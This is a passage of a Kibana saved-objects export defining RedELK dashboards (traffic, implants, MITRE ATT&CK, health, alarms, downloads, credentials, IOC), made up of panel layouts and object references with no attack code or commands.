"RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1643016059071, 291], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642171876916, 56], "type": "dashboard", "version": "1"} +{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642171876916, 63], "type": "dashboard", "version": "1"} +{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642171876916, 71], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642171876916, 79], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":3,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":3,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":3,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.16.3\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":3,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.16.3\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":14,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1643016103992, 297], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over time\",\"panelRefName\":\"panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\"},\"panelIndex\":\"8c5ea210-ef6d-47a3-958b-16ccc6006582\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Total credentials\",\"panelRefName\":\"panel_8c5ea210-ef6d-47a3-958b-16ccc6006582\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},\"panelIndex\":\"b98cc0b8-ee93-4d34-b458-cd311eb995ea\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials realms\",\"panelRefName\":\"panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":19,\"i\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\"},\"panelIndex\":\"77f94499-3c4b-49c0-8379-62d38f4d7d8e\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e\"}]", "timeRestore": false, "title": "RedELK - Credentials dashboard", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "ab609c60-d319-11ea-9301-a30a04251ae9", "name": "f26413a8-7bc3-4d63-8e2e-02d1c8e06b51:panel_f26413a8-7bc3-4d63-8e2e-02d1c8e06b51", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "8c5ea210-ef6d-47a3-958b-16ccc6006582:panel_8c5ea210-ef6d-47a3-958b-16ccc6006582", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "b98cc0b8-ee93-4d34-b458-cd311eb995ea:panel_b98cc0b8-ee93-4d34-b458-cd311eb995ea", "type": "visualization"}, {"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "77f94499-3c4b-49c0-8379-62d38f4d7d8e:panel_77f94499-3c4b-49c0-8379-62d38f4d7d8e", "type": "search"}], "sort": [1642171876916, 85], "type": "dashboard", "version": "1"} +{"attributes": {"description": "RedELK IOC dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"w\":24,\"x\":0,\"y\":2},\"panelIndex\":\"dfd53850-c595-4597-bbb5-ea03fc22e880\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC over time\",\"panelRefName\":\"panel_dfd53850-c595-4597-bbb5-ea03fc22e880\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":11,\"i\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"w\":17,\"x\":31,\"y\":2},\"panelIndex\":\"f13deeb7-53dc-41af-9de0-486d7a171916\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"IOC 